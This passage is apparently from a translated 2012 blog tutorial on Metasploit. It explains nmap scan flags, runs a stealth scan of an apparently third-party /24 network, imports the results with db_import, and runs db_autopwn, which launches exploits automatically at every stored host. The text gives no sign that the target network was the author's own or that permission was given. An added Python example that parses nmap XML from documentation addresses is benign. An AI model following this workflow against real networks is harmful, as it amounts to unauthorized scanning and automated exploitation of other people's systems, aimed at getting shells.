-Pn : skip the ping. Don't use ping before the scan to decide whether a host is alive. Long, long ago, ping was a workable and reliable way to tell whether a host was up, but ever since some expert discovered that ping could be used to launch DDoS attacks, the ping protocol has been improved and guarded against. So these days failing to ping a host does not mean the host is down. You know what I mean.

Oh, and one more important parameter:

-v : show scan progress. Otherwise you will think nmap has died and impatiently Ctrl-C it.

So, an example of a commonly used scan command:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51

# a large block of output omitted

[/bash]

Then comes:

db_import ieroot

The ieroot file is the result of the nmap scan above.
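What db_import actually reads from the ieroot file is nmap's XML output. The reader below is an added example, not code from the original post or from Metasploit (whose own importer is Rex::Parser::NmapXMLStreamParser); it extracts the fields the hosts and services tables hold from a constructed sample document that uses RFC 5737 documentation addresses and a hypothetical hostname.

```python
# Reader for the nmap -oX (XML) file that db_import consumes. Added example, not
# code from the original post or from Metasploit, whose own importer is
# Rex::Parser::NmapXMLStreamParser. It extracts what the hosts and services
# tables show: address, hostname, open ports with banner, and the best OS match.
import xml.etree.ElementTree as ET

# Constructed sample document (RFC 5737 documentation addresses, hypothetical
# hostname), shaped like the output of an nmap -sS -A -v -oX scan.
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -A -v -oX ieroot 192.0.2.0/24" version="5.51">
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.51" addrtype="ipv4"/>
    <hostnames><hostname name="host51.example.net" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="closed" reason="reset"/>
        <service name="ftp" method="table" conf="3"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.2.3" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="8888"><state state="filtered" reason="no-response"/>
        <service name="sun-answerbook" method="table" conf="3"/></port>
    </ports>
    <os><osmatch name="Sun Solaris 9" accuracy="92">
      <osclass type="general purpose" vendor="Sun" osfamily="Solaris" osgen="9" accuracy="92"/>
    </osmatch></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.0.2.52" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(text):
    """Return one dict per host reported up: address, name, os and open services."""
    root = ET.fromstring(text)
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # hosts nmap never saw answer carry no ports; skip them
        addr = host.find("address[@addrtype='ipv4']")
        name = host.find("hostnames/hostname")
        osmatch = host.find("os/osmatch")  # nmap lists matches best-first
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed and filtered ports are not services
            svc = port.find("service")
            banner = " ".join(filter(None, [svc.get("product"), svc.get("version")])) if svc is not None else ""
            services.append({"port": int(port.get("portid")), "proto": port.get("protocol"),
                             "name": svc.get("name") if svc is not None else None, "info": banner})
        hosts.append({"address": addr.get("addr") if addr is not None else None,
                      "name": name.get("name") if name is not None else None,
                      "os": osmatch.get("name") if osmatch is not None else None,
                      "services": services})
    return hosts


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["address"], h["name"], h["os"], [(s["port"], s["name"], s["info"]) for s in h["services"]])
```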

And then:

load db_autopwn

db_autopwn then automatically scans for exploitable hosts.

A few commonly used db_autopwn parameters, explained:

-e : launch exploits against every host in the scan results in the database

-t : show all matching modules

-r : use a reverse connection. Reverse connections have their advantages: use this parameter to get through firewalls.

-x : select exploit modules by vulnerability reference

-p : select exploit modules by port. Many hosts have their service ports changed beyond recognition, so be careful with -p in that case.

So, the process goes like this:

[bash]

msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE        VERSION
21/tcp   closed ftp
80/tcp   closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   0.76 ms   121.250.211.1
2   ...
3   48.77 ms  202.194.0.125
4   0.62 ms   202.194.0.45
5   0.89 ms   58.194.164.174
6   1.70 ms   222.173.20.205
7   1.63 ms   60.235.2.77
8   11.68 ms  60.235.0.73
9   10.23 ms  202.97.42.174
10  23.02 ms  202.97.40.9
11  21.08 ms  202.97.33.30
12  21.44 ms  202.97.33.190
13  155.27 ms 202.97.50.122
14  324.65 ms 202.97.49.158
15  315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16  320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17  314.85 ms 216.218.213.250
18  320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19  299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20  309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)

Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------

msf > db_import ieroot
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

msf >

[/bash]

[bash]

msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions

msf > sessions -l

Active sessions
===============

No active sessions.

msf > hosts -d

Hosts
=====

address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device

[*] Deleted 1 hosts
msf >

[/bash]

Sessions are not easy to get. If you do get one, use sessions -i 1 to interact with the first session, and so on for the rest. Once you have a shell there is nothing more to say.